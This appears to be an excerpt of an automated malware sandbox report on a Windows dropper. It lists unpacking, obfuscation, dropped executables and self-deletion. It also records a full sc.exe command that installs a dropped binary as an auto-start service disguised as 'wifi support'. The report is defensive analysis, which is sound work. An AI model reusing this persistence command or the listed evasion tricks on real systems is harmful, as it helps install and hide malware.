                      Source: Binary string: kJC:\tozeroc-watege99_zaga\vifalaro.pdb source: 4187.exe, 0000002A.00000003.446573203.0000000000CB0000.00000004.00000001.sdmp
                      Source: Binary string: ZC:\gilos\ye.pdbhQD source: 18D.exe, 00000012.00000002.391234957.0000000000782000.00000004.00000001.sdmp, 18D.exe, 00000012.00000000.365358490.0000000000401000.00000020.00020000.sdmp, sdiimdop.exe, 0000001F.00000000.391356677.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.465105222.0000000003258000.00000004.00000001.sdmp
                      Source: Binary string: VC:\hatisicovapehe\p.pdb source: 2997.exe, 00000011.00000002.369808653.0000000000409000.00000020.00020000.sdmp, 2997.exe, 00000011.00000000.353771272.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\tozeroc-watege99_zaga\vifalaro.pdb source: 4187.exe, 0000002A.00000003.446573203.0000000000CB0000.00000004.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeUnpacked PE file: 18.2.18D.exe.400000.0.unpack
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeUnpacked PE file: 31.2.sdiimdop.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\4187.exeUnpacked PE file: 42.2.4187.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\4187.exeUnpacked PE file: 42.2.4187.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeUnpacked PE file: 17.2.2997.exe.400000.0.unpack .text:ER;.data:W;.pamicak:W;.dos:W;.modav:W;.nugirof:W;.rsrc:R;.reloc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeUnpacked PE file: 18.2.18D.exe.400000.0.unpack .text:ER;.data:W;.lave:W;.fidoce:W;.pihudu:W;.lafog:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exeUnpacked PE file: 31.2.sdiimdop.exe.400000.0.unpack .text:ER;.data:W;.lave:W;.fidoce:W;.pihudu:W;.lafog:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\AppData\Roaming\scifbcdUnpacked PE file: 38.2.scifbcd.400000.0.unpack .text:ER;.data:W;.pamicak:W;.dos:W;.modav:W;.nugirof:W;.rsrc:R;.reloc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Local\Temp\4187.exeUnpacked PE file: 42.2.4187.exe.400000.0.unpack .text:ER;.data:W;.johac:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      .NET source code contains method to dynamically call methods (often used by packers)Show sources
                      Source: CBA.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 19.0.CBA.exe.cb0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 19.0.CBA.exe.cb0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 19.0.CBA.exe.cb0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 19.2.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 33.0.CBA.exe.f90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 33.0.CBA.exe.f90000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_00422188 push eax; ret
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_00543634 push es; iretd
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_00401880 push esi; iretd
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_2_00402E94 push es; iretd
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 1_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 13_2_00473634 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 14_2_00473634 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 14_2_006C97F2 push esi; ret
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 14_2_006C978D push esi; ret
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\haifbcdCode function: 15_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 16_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\115B.exeCode function: 16_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_00422368 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_00788964 push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_007889A6 push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_0078CAF0 pushfd ; retf
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeCode function: 17_2_0078EA86 push esp; iretd
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_0041A041 push ds; iretd
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00417819 push cs; ret
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00415896 push es; retf
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_004179DB push eax; iretd
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00416264 pushfd ; iretd
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_004186F0 pushad ; retf
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00419EA2 push esi; retf
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00419F4E push 71586EF6h; iretd
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00421F58 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00774772 push ds; ret
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00776F68 push 0000002Bh; iretd
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeCode function: 19_2_00CB765B push ebp; ret
                      Source: C:\Users\user\Desktop\nkINykHreE.exeCode function: 0_2_004309A0 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: CBA.exe.3.drStatic PE information: 0x8A3B5B05 [Sun Jun 28 23:08:53 2043 UTC]
                      Source: nkINykHreE.exeStatic PE information: section name: .bekuvox
                      Source: nkINykHreE.exeStatic PE information: section name: .jutu
                      Source: nkINykHreE.exeStatic PE information: section name: .vezev
                      Source: nkINykHreE.exeStatic PE information: section name: .mubone
                      Source: 115B.exe.3.drStatic PE information: section name: .bekuvox
                      Source: 115B.exe.3.drStatic PE information: section name: .jutu
                      Source: 115B.exe.3.drStatic PE information: section name: .vezev
                      Source: 115B.exe.3.drStatic PE information: section name: .mubone
                      Source: 2997.exe.3.drStatic PE information: section name: .pamicak
                      Source: 2997.exe.3.drStatic PE information: section name: .dos
                      Source: 2997.exe.3.drStatic PE information: section name: .modav
                      Source: 2997.exe.3.drStatic PE information: section name: .nugirof
                      Source: 4187.exe.3.drStatic PE information: section name: .johac
                      Source: 1B15.exe.3.drStatic PE information: section name: .nulec
                      Source: 1B15.exe.3.drStatic PE information: section name: .pexano
                      Source: 1B15.exe.3.drStatic PE information: section name: .tufeh
                      Source: 1B15.exe.3.drStatic PE information: section name: .rijeyo
                      Source: 28C2.exe.3.drStatic PE information: section name: .wibobah
                      Source: 315E.exe.3.drStatic PE information: section name:
                      Source: 315E.exe.3.drStatic PE information: section name:
                      Source: 315E.exe.3.drStatic PE information: section name:
                      Source: 315E.exe.3.drStatic PE information: section name:
                      Source: 315E.exe.3.drStatic PE information: section name:
                      Source: 315E.exe.3.drStatic PE information: section name:
                      Source: 315E.exe.3.drStatic PE information: section name:
                      Source: 315E.exe.3.drStatic PE information: section name: .7w0DPA1
                      Source: 315E.exe.3.drStatic PE information: section name: .adata
                      Source: 4583.exe.3.drStatic PE information: section name: .himav
                      Source: 4BED.exe.3.drStatic PE information: section name:
                      Source: 4BED.exe.3.drStatic PE information: section name:
                      Source: 4BED.exe.3.drStatic PE information: section name:
                      Source: 18D.exe.3.drStatic PE information: section name: .lave
                      Source: 18D.exe.3.drStatic PE information: section name: .fidoce
                      Source: 18D.exe.3.drStatic PE information: section name: .pihudu
                      Source: 18D.exe.3.drStatic PE information: section name: .lafog
                      Source: haifbcd.3.drStatic PE information: section name: .bekuvox
                      Source: haifbcd.3.drStatic PE information: section name: .jutu
                      Source: haifbcd.3.drStatic PE information: section name: .vezev
                      Source: haifbcd.3.drStatic PE information: section name: .mubone
                      Source: scifbcd.3.drStatic PE information: section name: .pamicak
                      Source: scifbcd.3.drStatic PE information: section name: .dos
                      Source: scifbcd.3.drStatic PE information: section name: .modav
                      Source: scifbcd.3.drStatic PE information: section name: .nugirof
                      Source: sdiimdop.exe.18.drStatic PE information: section name: .lave
                      Source: sdiimdop.exe.18.drStatic PE information: section name: .fidoce
                      Source: sdiimdop.exe.18.drStatic PE information: section name: .pihudu
                      Source: sdiimdop.exe.18.drStatic PE information: section name: .lafog
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .rdata
                      Source: 315E.exe.3.drStatic PE information: real checksum: 0x2be809 should be: 0x18483a
                      Source: 13E0.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x1fc0c4
                      Source: CBA.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x881f2
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.85301887621
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.85301887621
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.86420375863
                      Source: initial sampleStatic PE information: section name: .rdata entropy: 7.99705651429
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.73188934702
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.74923662565
                      Source: initial sampleStatic PE information: section name: entropy: 7.99764058394
                      Source: initial sampleStatic PE information: section name: entropy: 7.89880329126
                      Source: initial sampleStatic PE information: section name: entropy: 7.99168901934
                      Source: initial sampleStatic PE information: section name: entropy: 7.83347227701
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22930647149
                      Source: initial sampleStatic PE information: section name: entropy: 7.9648385851
                      Source: initial sampleStatic PE information: section name: entropy: 7.57856847804
                      Source: initial sampleStatic PE information: section name: .7w0DPA1 entropy: 7.91708548884
                      Source: initial sampleStatic PE information: section name: entropy: 7.99965749705
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.84705231543
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.85301887621
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.86420375863
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.84705231543
                      Source: CBA.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: CBA.exe.3.dr, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'UVoK2hYfBvAD7M528EQ'
                      Source: CBA.exe.3.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'
                      Source: 19.0.CBA.exe.cb0000.1.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'UVoK2hYfBvAD7M528EQ'
                      Source: 19.0.CBA.exe.cb0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'
                      Source: 19.0.CBA.exe.cb0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 19.0.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 19.0.CBA.exe.cb0000.0.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'UVoK2hYfBvAD7M528EQ'
                      Source: 19.0.CBA.exe.cb0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'
                      Source: 19.0.CBA.exe.cb0000.3.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'UVoK2hYfBvAD7M528EQ'
                      Source: 19.0.CBA.exe.cb0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'
                      Source: 19.0.CBA.exe.cb0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 19.0.CBA.exe.cb0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 19.0.CBA.exe.cb0000.2.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'UVoK2hYfBvAD7M528EQ'
                      Source: 19.0.CBA.exe.cb0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'
                      Source: 19.2.CBA.exe.cb0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'
                      Source: 19.2.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 33.0.CBA.exe.f90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 33.0.CBA.exe.f90000.2.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'UVoK2hYfBvAD7M528EQ'
                      Source: 33.0.CBA.exe.f90000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'
                      Source: 33.0.CBA.exe.f90000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'i2HFVLZ8Ma', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: 33.0.CBA.exe.f90000.7.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.csHigh entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'UVoK2hYfBvAD7M528EQ'
                      Source: 33.0.CBA.exe.f90000.7.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'VshGL2ekeg', '.cctor', 'Pk9ha7OyGensurko62', 'HZqeaOfgxj7yWRfS2q', 'uRTBVaMp3D2qXxSWd2', 'U2LXESlSGbc0351OHr'

                      Persistence and Installation Behavior:

                      barindex
                      Drops executables to the windows directory (C:\Windows) and starts themShow sources
                      Source: unknownExecutable created and started: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile created: C:\ProgramData\sqlite3.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\haifbcdJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\scifbcdJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\13E0.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\haifbcdJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\scifbcdJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile created: C:\ProgramData\sqlite3.dllJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\28C2.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4BED.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4187.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4583.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CBA.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\18D.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\315E.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeFile created: C:\Users\user\AppData\Local\Temp\sdiimdop.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1B15.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2757.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\115B.exeJump to dropped file
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2997.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\2757.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\sqlite3[1].dllJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe (copy)Jump to dropped file
                      Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\dbgxuqbr
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Deletes itself after installationShow sources
                      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\nkinykhree.exeJump to behavior
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\haifbcd:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeCode function: 18_2_00401000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\18D.exeProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\CBA.exeProcess information set: NOOPENFILEERRORBOX
